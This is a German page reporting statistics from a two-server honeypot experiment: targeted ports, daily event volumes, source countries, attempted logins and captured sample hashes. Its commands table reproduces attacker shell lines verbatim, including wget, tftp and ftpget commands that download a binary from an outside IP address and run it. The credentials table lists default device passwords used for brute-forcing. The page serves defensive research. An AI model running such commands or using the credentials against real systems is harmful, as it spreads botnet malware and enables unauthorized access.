Zum Inhalt springen

Honeypot-Experiment

Ergebnisse

Statistiken aus beiden Honeypots. Zu jedem Diagramm und jeder Tabelle gibt es einen Zeitrahmen, die CSV-Quelldatei und das Skript, mit dem die Zahlen berechnet wurden – damit jeder die Zahlen nach Belieben selbst nachrechnen kann.

Daten aktualisiert: 03.10.2026 10:31:16 UTC+02:00

Problem melden

Port-Rangliste #


Haupttabelle des Experiments: Welche Ports standen bei den Angreifern am meisten im Fokus? Die Tabelle lässt sich nach einer beliebigen Spalte sortieren, nach Server filtern und nach einem bestimmten Port, einem Portbereich oder einem Dienstnamen durchsuchen. Auf jede Zeile kann verwiesen werden, zum Beispiel #port-3389.

Bei srv4 wird der tatsächliche Zielport aus hptcp berücksichtigt. Die Umleitungsports (42222, 42223, 42280, 42443) werden nicht als Zielports gezählt.
Port Protokoll Üblicher Service Server Versuche Eindeutige IP-Adresse Anteil
5901 tcp VNC beide Server 883.864 801 16,1 %
3389 tcp RDP beide Server 734.148 2.425 13,4 %
3389 tcp RDP srv4 726.599 1.515 18,1 %
5900 tcp VNC beide Server 707.172 1.343 12,9 %
445 tcp SMB beide Server 459.930 6.055 8,4 %
5901 tcp VNC srv4 449.586 598 11,2 %
5901 tcp VNC srv3 434.278 655 29,7 %
445 tcp SMB srv3 415.953 5.570 28,4 %
5900 tcp VNC srv4 360.884 1.098 9,0 %
5900 tcp VNC srv3 346.288 1.176 23,7 %
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
honeypot-ports-aggregated-20260922.csv
Skript
wird veröffentlicht
Format
Felddokumentation

Entwicklung im Zeitverlauf #


Das Ereignisvolumen im Zeitverlauf, unterteilt in Kampagnen und Hintergrundrauschen, sowie darunter die Anzahl der eindeutigen IP-Adressen. Den Logdateien der Agenten zufolge konnten die einzelnen Kampagnen den Großteil des täglichen Datenverkehrs erzeugen. Ohne diese Aufteilung würde das Diagramm ein falsches Bild vermitteln: Die Kampagne würde wie ein Trend erscheinen und ihr Ende wie ein Ausfall der Datenerfassung.

Wie genau sich die Kampagne vom Grundrauschen abhebt, wird durch das unter dem Diagramm angegebene Skript bestimmt.

Anzahl der Ereignisse

  • Grundrauschen
  • Kampagnen
0200k400k600k800k22. 8.22.08.2026 Grundrauschen: 22.460 Kampagnen: 59.843 Insgesamt: 82.303 Unvollständiger Zeitraum – Daten für 12 h / 24 h23.08.2026 Grundrauschen: 45.099 Kampagnen: 34.177 Insgesamt: 79.27624.08.2026 Grundrauschen: 38.153 Kampagnen: 10.775 Insgesamt: 48.92825. 8.25.08.2026 Grundrauschen: 40.077 Kampagnen: 29.825 Insgesamt: 69.90226.08.2026 Grundrauschen: 40.083 Kampagnen: 28.709 Insgesamt: 68.79227.08.2026 Grundrauschen: 42.664 Kampagnen: 161.642 Insgesamt: 204.30628. 8.28.08.2026 Grundrauschen: 42.779 Kampagnen: 159.044 Insgesamt: 201.82329.08.2026 Grundrauschen: 34.634 Kampagnen: 171.641 Insgesamt: 206.27530.08.2026 Grundrauschen: 37.426 Kampagnen: 148.263 Insgesamt: 185.68931. 8.31.08.2026 Grundrauschen: 35.671 Kampagnen: 504.248 Insgesamt: 539.91901.09.2026 Grundrauschen: 53.935 Kampagnen: 666.265 Insgesamt: 720.20002.09.2026 Grundrauschen: 65.803 Kampagnen: 209.955 Insgesamt: 275.7583. 9.03.09.2026 Grundrauschen: 46.703 Kampagnen: 227.972 Insgesamt: 274.67504.09.2026 Grundrauschen: 51.972 Kampagnen: 167.450 Insgesamt: 219.42205.09.2026 Grundrauschen: 58.392 Kampagnen: 95.631 Insgesamt: 154.0236. 9.06.09.2026 Grundrauschen: 85.408 Kampagnen: 46.399 Insgesamt: 131.80707.09.2026 Grundrauschen: 89.526 Kampagnen: 94.877 Insgesamt: 184.40308.09.2026 Grundrauschen: 109.966 Kampagnen: 59.781 Insgesamt: 169.7479. 9.09.09.2026 Grundrauschen: 128.711 Kampagnen: 48.861 Insgesamt: 177.57210.09.2026 Grundrauschen: 132.528 Kampagnen: 60.866 Insgesamt: 193.39411.09.2026 Grundrauschen: 147.151 Kampagnen: 63.267 Insgesamt: 210.41812. 9.12.09.2026 Grundrauschen: 171.996 Kampagnen: 82.831 Insgesamt: 254.82713.09.2026 Grundrauschen: 131.895 Kampagnen: 105.016 Insgesamt: 236.91114.09.2026 Grundrauschen: 129.805 Kampagnen: 83.835 Insgesamt: 213.64015. 9.15.09.2026 Grundrauschen: 112.933 Kampagnen: 159.141 Insgesamt: 272.07416.09.2026 Grundrauschen: 72.402 Kampagnen: 28.713 Insgesamt: 101.115 Unvollständiger Zeitraum – Daten für 12 h / 24 h

Eindeutige IP-Adressen

Anzahl der verschiedenen Quell-IP-Adressen pro Tag.

  • srv3
  • srv4
02k4k6ksrv4srv322. 8.25. 8.28. 8.31. 8.3. 9.6. 9.9. 9.12. 9.15. 9.22.08.2026 srv3: 547 srv4: 1.870 Unvollständiger Zeitraum – Daten für 12 h / 24 h23.08.2026 srv3: 1.292 srv4: 3.52924.08.2026 srv3: 1.429 srv4: 3.30925.08.2026 srv3: 1.552 srv4: 3.82426.08.2026 srv3: 1.552 srv4: 3.77527.08.2026 srv3: 1.585 srv4: 4.30128.08.2026 srv3: 1.364 srv4: 4.08329.08.2026 srv3: 1.029 srv4: 3.85330.08.2026 srv3: 975 srv4: 4.17631.08.2026 srv3: 1.488 srv4: 4.18301.09.2026 srv3: 1.573 srv4: 4.50002.09.2026 srv3: 1.859 srv4: 4.28103.09.2026 srv3: 1.621 srv4: 4.34304.09.2026 srv3: 1.628 srv4: 4.08705.09.2026 srv3: 1.535 srv4: 4.11706.09.2026 srv3: 1.637 srv4: 4.34907.09.2026 srv3: 1.494 srv4: 4.40208.09.2026 srv3: 1.758 srv4: 4.60909.09.2026 srv3: 1.733 srv4: 4.67110.09.2026 srv3: 1.818 srv4: 5.09511.09.2026 srv3: 1.747 srv4: 5.40212.09.2026 srv3: 1.859 srv4: 5.45013.09.2026 srv3: 1.854 srv4: 5.43414.09.2026 srv3: 1.994 srv4: 5.51615.09.2026 srv3: 1.884 srv4: 5.30316.09.2026 srv3: 1.386 srv4: 3.449 Unvollständiger Zeitraum – Daten für 12 h / 24 h

Einzigartige IP-Adressen lassen sich nicht über die Server hinweg zusammenzählen – dieselbe Adresse könnte beide angegriffen haben. Jeder Server hat daher eine eigene Zeile.

Abgedunkelte Spalten und leere Kreise stehen für unvollständige Zeiträume: Das Erfassungsfenster beginnt und endet um 12:00 Uhr UTC, und der durch den ausgewählten Bereich abgeschnittene Zeitraum ist kürzer als die anderen. Vergleichen Sie ihn daher nicht mit den benachbarten Zeiträumen.

Werte als Tabelle anzeigen
Tag (UTC) Ereignis Kampagnen Grundrauschen Eindeutige IP-Adresse srv3 Eindeutige IP-Adresse srv4
22.08.2026 · unvollständig 82.303 59.843 22.460 547 1.870
23.08.2026 79.276 34.177 45.099 1.292 3.529
24.08.2026 48.928 10.775 38.153 1.429 3.309
25.08.2026 69.902 29.825 40.077 1.552 3.824
26.08.2026 68.792 28.709 40.083 1.552 3.775
27.08.2026 204.306 161.642 42.664 1.585 4.301
28.08.2026 201.823 159.044 42.779 1.364 4.083
29.08.2026 206.275 171.641 34.634 1.029 3.853
30.08.2026 185.689 148.263 37.426 975 4.176
31.08.2026 539.919 504.248 35.671 1.488 4.183
01.09.2026 720.200 666.265 53.935 1.573 4.500
02.09.2026 275.758 209.955 65.803 1.859 4.281
03.09.2026 274.675 227.972 46.703 1.621 4.343
04.09.2026 219.422 167.450 51.972 1.628 4.087
05.09.2026 154.023 95.631 58.392 1.535 4.117
06.09.2026 131.807 46.399 85.408 1.637 4.349
07.09.2026 184.403 94.877 89.526 1.494 4.402
08.09.2026 169.747 59.781 109.966 1.758 4.609
09.09.2026 177.572 48.861 128.711 1.733 4.671
10.09.2026 193.394 60.866 132.528 1.818 5.095
11.09.2026 210.418 63.267 147.151 1.747 5.402
12.09.2026 254.827 82.831 171.996 1.859 5.450
13.09.2026 236.911 105.016 131.895 1.854 5.434
14.09.2026 213.640 83.835 129.805 1.994 5.516
15.09.2026 272.074 159.141 112.933 1.884 5.303
16.09.2026 · unvollständig 101.115 28.713 72.402 1.386 3.449
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
timeline-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation

Karte zur Herkunft der Verbindungen #


Woher die Verbindungen kamen. Das Land wird anhand der registrierten IP-Adresse bestimmt, nicht anhand des tatsächlichen Standorts des Angreifers – hinter der Adresse kann sich ein gemieteter Server oder ein infizierter Computer an einem beliebigen Ort der Welt verbergen. Die genauen Zahlen finden Sie in den folgenden Tabellen.

Die Karte wird vom Dienst Datawrapper dargestellt; beim Laden der Karte stellt der Browser eine Verbindung zu dessen Servern her. Karte separat öffnen

Geografie und Netzwerke #


Woher der Datenverkehr stammte, basierend auf der Geolokalisierung der Quell-IP-Adresse und zu welchen autonomen Systemen (ASN) die Adressen gehören. Die Geolokalisierung gibt an, wo die Adresse registriert ist, nicht, wo sich der Angreifer befindet.

Die häufigsten Länder

  1. US 37,6 %2.057.660
  2. DE 22,5 %1.230.744
  3. CN 10,2 %556.778
  4. GB 8,9 %486.870
  5. SC 3,4 %184.746
  6. NL 2,2 %120.671
  7. TN 1,8 %96.601
  8. VN 1,2 %64.512
  9. MX 1,1 %59.561
  10. IN 0,9 %49.705
  11. SG 0,9 %49.368
  12. BR 0,8 %44.530
  13. RU 0,8 %42.439
  14. HK 0,7 %38.439
  15. RO 0,7 %37.368

Die größten Netzwerke (ASN)

ASN Netzwerk Ereignis Eindeutige IP-Adresse Anteil
265391 PROVEX TELECOMUNICACOES LTDA
BR
1 1 0,0 %
328661 C-Way-Computers
ZA
1 1 0,0 %
57800 KADRTV-AS
UA
1 1 0,0 %
61312 BROVARY-AS
UA
1 1 0,0 %
24852 VINITA
LT
1 1 0,0 %
131596 TBCOM-NET TBC
TW
1 1 0,0 %
328408 HAMILTON-TELECOM-AS
UG
1 1 0,0 %
37532 ZAMREN
ZM
1 1 0,0 %
Werte als Tabelle anzeigen
Land Ereignis Eindeutige IP-Adresse Anteil
US 2.057.660 13.624 37,6 %
DE 1.230.744 1.111 22,5 %
CN 556.778 5.671 10,2 %
GB 486.870 2.870 8,9 %
SC 184.746 319 3,4 %
NL 120.671 174 2,2 %
TN 96.601 94 1,8 %
VN 64.512 644 1,2 %
MX 59.561 281 1,1 %
IN 49.705 850 0,9 %
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
geo-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation

Anmeldedaten #


Die Kombinationen aus Benutzername und Passwort, die Angreifer ausprobiert haben, sowie die am häufigsten getesteten Benutzernamen. Die Werte werden genau so angezeigt, wie sie eingegangen sind.

Die am häufigsten getesteten Benutzernamen

  1. root 4.665 Einträge43.470
  2. admin 722 Einträge10.909
  3. enable\x00 2 Einträge2.938
  4. user 216 Einträge2.100
  5. sa 83 Einträge2.049
  6. support 178 Einträge1.551
  7. test 215 Einträge1.518
  8. ubuntu 100 Einträge1.456
  9. cloud 148 Einträge1.281
  10. postgres 93 Einträge1.198
  11. batacek 147 Einträge1.164
  12. srv 147 Einträge1.154
  13. shell\x00 1 Einträge965
  14. deploy 66 Einträge925
  15. ftp 459 Einträge876

Die häufigsten Kombinationen

Name Passwort Versuche Eindeutige IP-Adresse
root (leer) 3.084 219
admin admin 2.649 849
enable\x00 linuxshell\x00 1.955 24
admin (leer) 1.939 69
root xc3511 1.591 76
root admin 1.529 160
root vizxv 1.523 120
root 123456 1.207 142
support support 990 129
enable\x00 system\x00 983 27
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
credentials-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation

Was geschah nach der Anmeldung? #


Befehle, die Angreifer in der emulierten Shell eingegeben haben, sortiert nach Häufigkeit. Es handelt sich um die Eingaben des Angreifers, nicht um Code, der tatsächlich auf dem Server ausgeführt würde.

Die Originalaufzeichnung, genau so dargestellt, wie sie entstanden ist.
Befehl Anzahl Beziehungen
>/usr/d && chmod 777 /usr/d && /usr/d && cd /usr/ 510 510
>/var/d && chmod 777 /var/d && /var/d && cd /var/ 510 510
>/var/run/d && chmod 777 /var/run/d && /var/run/d && cd /var/run/ 510 510
>/var/tmp/d && chmod 777 /var/tmp/d && /var/tmp/d && cd /var/tmp/ 510 510
(wget http://185.93.89.72/wget -O- || busybox wget http://185.93.89.72/wget -O-) > w; chmod 777 w; ./w; rm -rf w 501 501
(tftp -g 185.93.89.72 -r tftp -l- || busybox tftp -g 185.93.89.72 -r tftp -l-) > t; chmod 777 t; ./t; rm -rf t 489 489
(ftpget 185.93.89.72 f ftpget || busybox ftpget 185.93.89.72 f ftpget) > f; chmod 777 f; ./f; rm -rf f 485 485
cd /dev/ 432 432
rm /dev/.t; rm /dev/.sh; rm /dev/.human 432 432
cat /bin/echo 411 411
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
attacker-commands-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation

Entnommene Proben #


Dateien, die Angreifer je nach Typ und Architektur herunterzuladen oder hochzuladen versucht haben.

Hier gibt es nur Hashes und Metadaten. Die Samples selbst befinden sich in einem passwortgeschützten Archiv im Bereich Daten

Nach Dateityp

  1. PE1.058
  2. ELF58
  3. script39
  4. data35

Nach Architektur

  1. —1.132
  2. x86_6424
  3. arm11
  4. x864
  5. mips4
  6. mipsel4
  7. aarch643
  8. riscv2
  9. elf-0x5d2
  10. sh1
  11. elf-0x41
  12. ppc1
  13. sparc1
SHA-256 Typ Architektur Größe Zum ersten Mal Aufgenommen Suchen
494be307b2f51eb0386d3622ff35dde196b379c992e5fe7e5760a01896e9d6c0 data — 25 B 14.09.2026 08:01:45 1 VirusTotal
a97f87e56b887be863f8930218391e16dac5834165d6a17edbba752c96e45f3f data — 25 B 14.09.2026 08:01:45 1 VirusTotal
0c2674b616f911c419c427ce75d73c65c086edd4b71cecf5e3c80d25af5db20e data — 25 B 14.09.2026 08:08:51 1 VirusTotal
3cf5d123b54217d4a01eb998fb8aa201aa5aafa3e7bde1c83f74873da133fe16 data — 25 B 14.09.2026 08:08:51 1 VirusTotal
c2466bb641245ed90e1aaad7b45f29ffe31bfe4e2e231fd685f0fe7f9bebc662 data — 25 B 14.09.2026 09:19:50 1 VirusTotal
ca9473e948393ada8b5ccf5222b7c86e1bee457b9d76d1bab46a74d64d09c788 data — 25 B 14.09.2026 09:19:50 1 VirusTotal
3ad6028da82bf92d49c010e0f2d7346aeb9db76bd877ef3aa009360800702c81 data — 25 B 14.09.2026 09:25:38 1 VirusTotal
1ed05ae318e18c85f975e0ef6bbabec752b1a6748438347dc9a0de0ad6b5d0d6 data — 25 B 14.09.2026 09:25:38 1 VirusTotal
7575206dd14b59d837e92c412f3a0da69dcbee6eca4abd617d78b2b0b1c17ab8 data — 25 B 14.09.2026 10:22:42 1 VirusTotal
17c18dbdd4886a700be8a8ef7969d52a6bcb89d11c3d97c522599aa713ed98e8 data — 25 B 14.09.2026 10:22:42 1 VirusTotal
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
samples-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation

Serververgleich #


Wie viel mehr Traffic hat die größere Fläche gebracht und worin unterscheiden sich die beiden Server hinsichtlich ihrer Struktur?

Die absoluten Zahlen beider Server sind nicht vergleichbar, da srv4 eine um ein Vielfaches größere Fläche bot. Es ist sinnvoll, die Struktur und die Reihenfolge zu vergleichen, nicht die Größe. Mehr
Zeiger srv3 srv4 srv4 / srv3
Verbindungsversuche (Port-Rangliste) 1.462.877 4.014.322 2,7×
Betroffene Ports 45 58.628 1.302,8×
Ereignisse (Entwicklung im Zeitverlauf) 1.462.877 4.014.322 2,7×

srv3 die häufigsten Ports

  1. 5901/tcp VNC434.278
  2. 445/tcp SMB415.953
  3. 5900/tcp VNC346.288
  4. 22/tcp SSH77.679
  5. 443/tcp HTTPS25.880
  6. 23/tcp Telnet24.961
  7. 5060/udp SIP22.484
  8. 80/tcp HTTP18.336
  9. 3000/tcp HTTP alt9.322
  10. 3389/tcp RDP7.549

srv4 die häufigsten Ports

  1. 3389/tcp RDP726.599
  2. 5901/tcp VNC449.586
  3. 5900/tcp VNC360.884
  4. 1256/tcp341.276
  5. 8787/tcp340.499
  6. 8082/tcp HTTP alt323.345
  7. 1080/tcp SOCKS270.186
  8. 5800/tcp VNC HTTP159.507
  9. 22/tcp SSH61.829
  10. 445/tcp SMB43.977
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
honeypot-ports-aggregated-20260922.csv, timeline-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation